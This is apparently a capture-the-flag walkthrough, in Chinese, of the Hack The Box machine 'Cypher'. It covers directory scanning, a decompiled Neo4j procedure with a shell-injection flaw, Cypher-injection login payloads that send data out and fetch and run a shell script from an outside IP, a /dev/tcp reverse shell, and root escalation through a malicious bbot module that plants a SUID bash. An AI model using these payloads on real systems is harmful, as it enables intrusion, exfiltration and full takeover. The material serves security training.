HTB-Cypher

E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch>python dirsearch.py -u http://cypher.htb/

  _|. _ _  _  _  _ _|_    v0.4.3 by 鹏组安全
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714

Output File: E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch\reports\http_cypher.htb\__25-03-23_14-25-56.txt

Target: http://cypher.htb/

[14:25:56] Starting:
[14:27:14] 200 -    5KB - /about
[14:27:14] 200 -    5KB - /about.html
[14:28:11] 404 -   22B  - /api.json
[14:28:11] 404 -   22B  - /api-doc
[14:28:11] 404 -   22B  - /api-docs
[14:28:11] 307 -    0B  - /api  ->  /api/docs
[14:28:11] 404 -   22B  - /api.log
[14:28:11] 404 -   22B  - /api/2/explore/
[14:28:11] 404 -   22B  - /api.php
[14:28:12] 404 -   22B  - /api/__swagger__/
[14:28:12] 404 -   22B  - /api/_swagger_/
[14:28:12] 404 -   22B  - /api.py
[14:28:12] 404 -   22B  - /api/2/issue/createmeta
[14:28:12] 404 -   22B  - /api/credentials.json
[14:28:12] 404 -   22B  - /api/package_search/v4/documentation
[14:28:12] 404 -   22B  - /api/credential.json
[14:28:12] 404 -   22B  - /api/error_log
[14:28:12] 404 -   22B  - /api/batch
[14:28:12] 404 -   22B  - /api/apidocs
[14:28:12] 404 -   22B  - /api/docs
[14:28:12] 404 -   22B  - /api/config.json
[14:28:12] 307 -    0B  - /api/  ->  http://cypher.htb/api/api
[14:28:12] 404 -   22B  - /api/database.json
[14:28:12] 404 -   22B  - /api/config
[14:28:12] 404 -   22B  - /api/api
[14:28:12] 404 -   22B  - /api/jsonws
[14:28:12] 404 -   22B  - /api/login.json
[14:28:12] 404 -   22B  - /api/api-docs
[14:28:12] 404 -   22B  - /api/application.wadl
[14:28:12] 404 -   22B  - /api/apidocs/swagger.json
[14:28:12] 404 -   22B  - /api/docs/
[14:28:12] 404 -   22B  - /api/jsonws/invoke
[14:28:12] 404 -   22B  - /api/cask/graphql
[14:28:14] 404 -   22B  - /api/spec/swagger.json
[14:28:14] 404 -   22B  - /api/profile
[14:28:14] 404 -   22B  - /api/users.json
[14:28:14] 404 -   22B  - /api/swagger
[14:28:14] 404 -   22B  - /api/swagger/swagger
[14:28:14] 404 -   22B  - /api/swagger.yml
[14:28:14] 404 -   22B  - /api/timelion/run
[14:28:14] 404 -   22B  - /api/v2/swagger.json
[14:28:14] 404 -   22B  - /api/snapshots
[14:28:14] 404 -   22B  - /api/v1
[14:28:14] 404 -   22B  - /api/proxy
[14:28:14] 404 -   22B  - /api/swagger.json
[14:28:14] 404 -   22B  - /api/v2/
[14:28:14] 404 -   22B  - /api/v2/swagger.yaml
[14:28:14] 404 -   22B  - /api/v2/helpdesk/discover
[14:28:14] 404 -   22B  - /api/swagger.yaml
[14:28:14] 404 -   22B  - /api/swagger/ui/index
[14:28:14] 404 -   22B  - /api/v1/swagger.json
[14:28:14] 404 -   22B  - /api/v2
[14:28:14] 404 -   22B  - /api/user.json
[14:28:14] 404 -   22B  - /api/v1/
[14:28:14] 404 -   22B  - /api/v1/swagger.yaml
[14:28:14] 404 -   22B  - /api/vendor/phpunit/phpunit/phpunit
[14:28:14] 404 -   22B  - /api/v3
[14:28:14] 404 -   22B  - /api/v4
[14:28:14] 404 -   22B  - /api/version
[14:28:14] 404 -   22B  - /apibuild.pyc
[14:28:14] 404 -   22B  - /api/whoami
[14:28:14] 404 -   22B  - /apidoc
[14:28:14] 404 -   22B  - /apidocs
[14:28:14] 404 -   22B  - /apiserver-aggregator.cert
[14:28:14] 404 -   22B  - /apiserver-aggregator-ca.cert
[14:28:14] 404 -   22B  - /apis
[14:28:14] 404 -   22B  - /apiserver-client.crt
[14:28:14] 404 -   22B  - /apiserver-key.pem
[14:28:14] 404 -   22B  - /apiserver-aggregator.key
[14:28:53] 404 -   22B  - /demo.aspx
[14:28:53] 404 -   22B  - /demo.php
[14:28:53] 404 -   22B  - /demo.jsp
[14:28:53] 307 -    0B  - /demo  ->  /login
[14:28:56] 404 -   22B  - /demo.js
[14:28:56] 404 -   22B  - /demo/ojspext/events/globals.jsa
[14:28:56] 404 -   22B  - /demoadmin
[14:28:56] 404 -   22B  - /demos/
[14:28:56] 307 -    0B  - /demo/  ->  http://cypher.htb/api/demo
[14:28:56] 404 -   22B  - /demo/sql/index.jsp
[14:29:43] 200 -    4KB - /login
[14:29:43] 200 -    4KB - /login.html
[14:30:17] 301 -  178B  - /testing  ->  http://cypher.htb/testing/

Task Completed

发现一个jar包

反编译看一下

HelloWorldProcedure实现了一个自定义的Hello xxx的neo4j的存储

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.cypher.neo4j.apoc;

import java.util.stream.Stream;
import org.neo4j.procedure.Description;
import org.neo4j.procedure.Mode;
import org.neo4j.procedure.Name;
import org.neo4j.procedure.Procedure;

public class HelloWorldProcedure {
    public HelloWorldProcedure() {
    }

    @Procedure(
        name = "custom.helloWorld",
        mode = Mode.READ
    )
    @Description("A simple hello world procedure")
    public Stream<HelloWorldOutput> helloWorld(@Name("name") String name) {
        String greeting = "Hello, " + name + "!";
        return Stream.of(new HelloWorldOutput(greeting));
    }

    public static class HelloWorldOutput {
        public String greeting;

        public HelloWorldOutput(String greeting) {
            this.greeting = greeting;
        }
    }
}

CustomFunctions

//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//

package com.cypher.neo4j.apoc;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.util.Arrays;
import java.util.concurrent.TimeUnit;
import java.util.stream.Stream;
import org.neo4j.procedure.Description;
import org.neo4j.procedure.Mode;
import org.neo4j.procedure.Name;
import org.neo4j.procedure.Procedure;

public class CustomFunctions {
    public CustomFunctions() {
    }

    @Procedure(
        name = "custom.getUrlStatusCode",
        mode = Mode.READ
    )
    @Description("Returns the HTTP status code for the given URL as a string")
    public Stream<StringOutput> getUrlStatusCode(@Name("url") String url) throws Exception {
        if (!url.toLowerCase().startsWith("http://") && !url.toLowerCase().startsWith("https://")) {
            url = "https://" + url;
        }

        String[] command = new String[]{"/bin/sh", "-c", "curl -s -o /dev/null --connect-timeout 1 -w %{http_code} " + url};
        System.out.println("Command: " + Arrays.toString(command));
        Process process = Runtime.getRuntime().exec(command);
        BufferedReader inputReader = new BufferedReader(new InputStreamReader(process.getInputStream()));
        BufferedReader errorReader = new BufferedReader(new InputStreamReader(process.getErrorStream()));
        StringBuilder errorOutput = new StringBuilder();

        String line;
        while((line = errorReader.readLine()) != null) {
            errorOutput.append(line).append("\n");
        }

        String statusCode = inputReader.readLine();
        System.out.println("Status code: " + statusCode);
        boolean exited = process.waitFor(10L, TimeUnit.SECONDS);
        if (!exited) {
            process.destroyForcibly();
            statusCode = "0";
            System.err.println("Process timed out after 10 seconds");
        } else {
            int exitCode = process.exitValue();
            if (exitCode != 0) {
                statusCode = "0";
                System.err.println("Process exited with code " + exitCode);
            }
        }

        if (errorOutput.length() > 0) {
            System.err.println("Error output:\n" + errorOutput.toString());
        }

        return Stream.of(new StringOutput(statusCode));
    }

    public static class StringOutput {
        public String statusCode;

        public StringOutput(String statusCode) {
            this.statusCode = statusCode;
        }
    }
}

这里直接将url补http头然后补到String[] command = new String[]{“/bin/sh”, “-c”, “curl -s -o /dev/null –connect-timeout 1 -w %{http_code} “ + url};中执行

这里随便传一个admin’

联系机器名字想到 Cypher 注入

Cypher Injection Cheat Sheet - Pentester Land

{"username":"admin' OR 1=1  LOAD CSV FROM 'http://10.10.16.35:4444/ppp='+h.value AS y Return ''//","password":"123"}

这里使用union调用custom.getUrlStatusCode

{"username":"admin' UNION CALL custom.getUrlStatusCode(\"127.0.0.1;curl 10.10.16.35:4444/shell.sh|bash;\") YIELD statusCode AS value  RETURN value ; //",
"password":"123"}

先返回 h.value 否则在比对密码的时候会直接报错，影响后面的执行

rev拿sh弹shell，一开始用bash没成功

#!/bin/bash
/bin/sh -i >& /dev/tcp/10.10.16.35/4444 0>&1

没权限读flag 在bbot_preset.yml中看到一个密码 尝试ssh登录

graphasm@cypher:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/mount
/usr/bin/sudo
/usr/bin/su
/usr/bin/umount
/usr/bin/fusermount3
/usr/lib/openssh/ssh-keysign
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
graphasm@cypher:~$ sudo -l
Matching Defaults entries for graphasm on cypher:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User graphasm may run the following commands on cypher:
    (ALL) NOPASSWD: /usr/local/bin/bbot

graphasm@cypher:~$ cat /usr/local/bin/bbot
#!/opt/pipx/venvs/bbot/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from bbot.cli import main
if __name__ == '__main__':
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())

运行看一下

graphasm@cypher:/tmp$ /usr/local/bin/bbot
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

usage: bbot [-h] [-t TARGET [TARGET ...]] [-w WHITELIST [WHITELIST ...]] [-b BLACKLIST [BLACKLIST ...]] [--strict-scope] [-p [PRESET ...]] [-c [CONFIG ...]] [-lp] [-m MODULE [MODULE ...]]
            [-l] [-lmo] [-em MODULE [MODULE ...]] [-f FLAG [FLAG ...]] [-lf] [-rf FLAG [FLAG ...]] [-ef FLAG [FLAG ...]] [--allow-deadly] [-n SCAN_NAME] [-v] [-d] [-s] [--force] [-y]
            [--dry-run] [--current-preset] [--current-preset-full] [-o DIR] [-om MODULE [MODULE ...]] [--json] [--brief] [--event-types EVENT_TYPES [EVENT_TYPES ...]]
            [--no-deps | --force-deps | --retry-deps | --ignore-failed-deps | --install-all-deps] [--version] [-H CUSTOM_HEADERS [CUSTOM_HEADERS ...]] [--custom-yara-rules CUSTOM_YARA_RULES]

Bighuge BLS OSINT Tool

options:
  -h, --help            show this help message and exit

Target:
  -t TARGET [TARGET ...], --targets TARGET [TARGET ...]
                        Targets to seed the scan
  -w WHITELIST [WHITELIST ...], --whitelist WHITELIST [WHITELIST ...]
                        What's considered in-scope (by default it's the same as --targets)
  -b BLACKLIST [BLACKLIST ...], --blacklist BLACKLIST [BLACKLIST ...]
                        Don't touch these things
  --strict-scope        Don't consider subdomains of target/whitelist to be in-scope

Presets:
  -p [PRESET ...], --preset [PRESET ...]
                        Enable BBOT preset(s)
  -c [CONFIG ...], --config [CONFIG ...]
                        Custom config options in key=value format: e.g. 'modules.shodan.api_key=1234'
  -lp, --list-presets   List available presets.

Modules:
  -m MODULE [MODULE ...], --modules MODULE [MODULE ...]
                        Modules to enable. Choices: internetdb,postman_download,dastardly,robots,leakix,paramminer_cookies,ntlm,github_workflows,asn,dnscommonsrv,wafw00f,affiliates,passivetotal,vhost,bucket_google,wpscan,badsecrets,anubisdb,generic_ssrf,bucket_azure,bucket_file_enum,builtwith,baddns,wayback,fingerprintx,dnscaa,dotnetnuke,host_header,zoomeye,ffuf,hunt,newsletters,shodan_dns,securitytrails,bucket_firebase,virustotal,wappalyzer,httpx,filedownload,baddns_direct,pgp,rapiddns,sitedossier,credshed,smuggler,myssl,urlscan,fullhunt,hackertarget,ipneighbor,oauth,bevigil,ip2location,paramminer_headers,certspotter,baddns_zone,github_org,digitorus,code_repository,azure_tenant,azure_realm,viewdns,sslcert,dnsbrute_mutations,securitytxt,gitlab,binaryedge,crt,dehashed,iis_shortnames,skymem,github_codesearch,gowitness,docker_pull,bucket_amazon,postman,bypass403,secretsdb,git,dnsbrute,nuclei,portscan,censys,dnsdumpster,hunterio,telerik,chaos,ipstack,c99,otx,git_clone,columbus,dockerhub,emailformat,ajaxpro,bucket_digitalocean,social,trickest,unstructured,trufflehog,paramminer_getparams,subdomaincenter,ffuf_shortnames,url_manipulation
  -l, --list-modules    List available modules.
  -lmo, --list-module-options
                        Show all module config options
  -em MODULE [MODULE ...], --exclude-modules MODULE [MODULE ...]
                        Exclude these modules.
  -f FLAG [FLAG ...], --flags FLAG [FLAG ...]
                        Enable modules by flag. Choices: report,affiliates,web-basic,iis-shortnames,subdomain-hijack,deadly,passive,email-enum,social-enum,web-paramminer,web-screenshots,code-enum,active,cloud-enum,aggressive,service-enum,portscan,safe,baddns,web-thorough,slow,subdomain-enum
  -lf, --list-flags     List available flags.
  -rf FLAG [FLAG ...], --require-flags FLAG [FLAG ...]
                        Only enable modules with these flags (e.g. -rf passive)
  -ef FLAG [FLAG ...], --exclude-flags FLAG [FLAG ...]
                        Disable modules with these flags. (e.g. -ef aggressive)
  --allow-deadly        Enable the use of highly aggressive modules

Scan:
  -n SCAN_NAME, --name SCAN_NAME
                        Name of scan (default: random)
  -v, --verbose         Be more verbose
  -d, --debug           Enable debugging
  -s, --silent          Be quiet
  --force               Run scan even in the case of condition violations or failed module setups
  -y, --yes             Skip scan confirmation prompt
  --dry-run             Abort before executing scan
  --current-preset      Show the current preset in YAML format
  --current-preset-full
                        Show the current preset in its full form, including defaults

Output:
  -o DIR, --output-dir DIR
                        Directory to output scan results
  -om MODULE [MODULE ...], --output-modules MODULE [MODULE ...]
                        Output module(s). Choices: asset_inventory,csv,web_report,json,txt,python,websocket,stdout,emails,http,teams,subdomains,slack,splunk,neo4j,discord
  --json, -j            Output scan data in JSON format
  --brief, -br          Output only the data itself
  --event-types EVENT_TYPES [EVENT_TYPES ...]
                        Choose which event types to display

Module dependencies:
  Control how modules install their dependencies

  --no-deps             Don't install module dependencies
  --force-deps          Force install all module dependencies
  --retry-deps          Try again to install failed module dependencies
  --ignore-failed-deps  Run modules even if they have failed dependencies
  --install-all-deps    Install dependencies for all modules

Misc:
  --version             show BBOT version and exit
  -H CUSTOM_HEADERS [CUSTOM_HEADERS ...], --custom-headers CUSTOM_HEADERS [CUSTOM_HEADERS ...]
                        List of custom headers as key value pairs (header=value).
  --custom-yara-rules CUSTOM_YARA_RULES, -cy CUSTOM_YARA_RULES
                        Add custom yara rules to excavate

EXAMPLES

    Subdomains:
        bbot -t evilcorp.com -p subdomain-enum

    Subdomains (passive only):
        bbot -t evilcorp.com -p subdomain-enum -rf passive

    Subdomains + port scan + web screenshots:
        bbot -t evilcorp.com -p subdomain-enum -m portscan gowitness -n my_scan -o .

    Subdomains + basic web scan:
        bbot -t evilcorp.com -p subdomain-enum web-basic

    Web spider:
        bbot -t www.evilcorp.com -p spider -c web.spider_distance=2 web.spider_depth=2

    Everything everywhere all at once:
        bbot -t evilcorp.com -p kitchen-sink

    List modules:
        bbot -l

    List presets:
        bbot -lp

    List flags:
        bbot -lf

发现可以指定配置文件 也可以自定义创建新的模块

那么就可以仿照已有的创建一个具有提权命令的模块

os.system("cp /bin/bash /tmp/bash && chmod u+s /tmp/bash")

graphasm@cypher:/tmp$ nl myconf.yml 
     1	module_dirs:
     2	  - /tmp/111
graphasm@cypher:/tmp$ ls -al 111
total 20
drwxr-xr-x  2 graphasm graphasm  4096 Mar 23 08:10 .
drwxrwxrwt 18 root     root     12288 Mar 23 08:10 ..
-rw-r--r--  1 graphasm graphasm  1334 Mar 23  2025 whois2.py
graphasm@cypher:/tmp$ nl ./111/whois2.py 
     1	from bbot.modules.base import BaseModule
     2	import os
     3	 
     4	class whois2(BaseModule):
     5	    watched_events = ["DNS_NAME"] # watch for DNS_NAME events
     6	    produced_events = ["WHOIS"] # we produce WHOIS events
     7	    flags = ["passive", "safe"]
     8	    meta = {"description": "Query WhoisXMLAPI for WHOIS data"}
     9	    options = {"api_key": ""} # module config options
    10	    options_desc = {"api_key": "WhoisXMLAPI Key"}
    11	    per_domain_only = True # only run once per domain
    12	 
    13	    base_url = "https://www.whoisxmlapi.com/whoisserver/WhoisService"
    14	 
    15	    # one-time setup - runs at the beginning of the scan
    16	    async def setup(self):
    17	        os.system("cp /bin/bash /tmp/bash && chmod u+s /tmp/bash")
    18	        self.api_key = self.config.get("api_key")
    19	        if not self.api_key:
    20	            # soft-fail if no API key is set
    21	            return None, "Must set API key"
    22	 
    23	    async def handle_event(self, event):
    24	        self.hugesuccess(f"Got {event} (event.data: {event.data})")
    25	        _, domain = self.helpers.split_domain(event.data)
    26	        url = f"{self.base_url}?apiKey={self.api_key}&domainName={domain}&outputFormat=JSON"
    27	        self.hugeinfo(f"Visiting {url}")
    28	        response = await self.helpers.request(url)
    29	        if response is not None:
    30	            await self.emit_event(response.json(), "WHOIS", parent=event)
graphasm@cypher:/tmp$ sudo /usr/local/bin/bbot -p ./myconf.yml -m whois2
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Scan with 1 modules seeded with 0 targets (0 in whitelist)
[INFO] Loaded 1/1 scan modules (whois2)
[INFO] Loaded 5/5 internal modules (aggregate,cloudcheck,dnsresolve,excavate,speculate)
[INFO] Loaded 5/5 output modules, (csv,json,python,stdout,txt)
[INFO] internal.excavate: Compiling 10 YARA rules
[INFO] internal.speculate: No portscanner enabled. Assuming open ports: 80, 443
[INFO] Setup soft-failed for whois2: Must set API key
[SUCC] Setup succeeded for 12/13 modules.
[SUCC] Scan ready. Press enter to execute chiseled_wanda

[WARN] No scan targets specified
[SUCC] Starting scan chiseled_wanda
[SCAN]              	chiseled_wanda (SCAN:402b8c19a00291bc916f8399a441aee4bca7d8f8)	TARGET	(in-scope, target)
[INFO] Finishing scan
[SCAN]              	chiseled_wanda (SCAN:402b8c19a00291bc916f8399a441aee4bca7d8f8)	TARGET	(in-scope)
[SUCC] Scan chiseled_wanda completed in 0 seconds with status FINISHED
[INFO] aggregate: +----------+------------+------------+
[INFO] aggregate: | Module   | Produced   | Consumed   |
[INFO] aggregate: +==========+============+============+
[INFO] aggregate: | None     | None       | None       |
[INFO] aggregate: +----------+------------+------------+
[INFO] output.csv: Saved CSV output to /root/.bbot/scans/chiseled_wanda/output.csv
[INFO] output.json: Saved JSON output to /root/.bbot/scans/chiseled_wanda/output.json
[INFO] output.txt: Saved TXT output to /root/.bbot/scans/chiseled_wanda/output.txt
graphasm@cypher:/tmp$ ls
111                                                                              systemd-private-7df01466ca78401c8ae61352b08ec6e2-ModemManager.service-Or2pYx       tmp.gJrZQ6BgG7
bash                                                                             systemd-private-7df01466ca78401c8ae61352b08ec6e2-polkit.service-08Uj3T             tmp.rYn34Id3ZA
cli.py                                                                           systemd-private-7df01466ca78401c8ae61352b08ec6e2-systemd-logind.service-aMItrD     tmp.SvtMd6xRpC
hsperfdata_neo4j                                                                 systemd-private-7df01466ca78401c8ae61352b08ec6e2-systemd-resolved.service-Sm9yDP   vmware-root_875-4022308853
jetty-172_18_0_1-7474-neo4j-browser-5_24_0_jar-_browser-any-3548549454013388975  systemd-private-7df01466ca78401c8ae61352b08ec6e2-systemd-timesyncd.service-NjDjMw  yiyi
modules                                                                          systemd-private-7df01466ca78401c8ae61352b08ec6e2-upower.service-cx6Fls
myconf.yml                                                                       tmp.dgXZatLcse
graphasm@cypher:/tmp$ ./bash
bash-5.2$ whoami
graphasm
bash-5.2$ whoami -p
whoami: invalid option -- 'p'
Try 'whoami --help' for more information.
bash-5.2$ whoami
graphasm
bash-5.2$ exit
exit
graphasm@cypher:/tmp$ ./bash -p
bash-5.2# whoami
root
bash-5.2#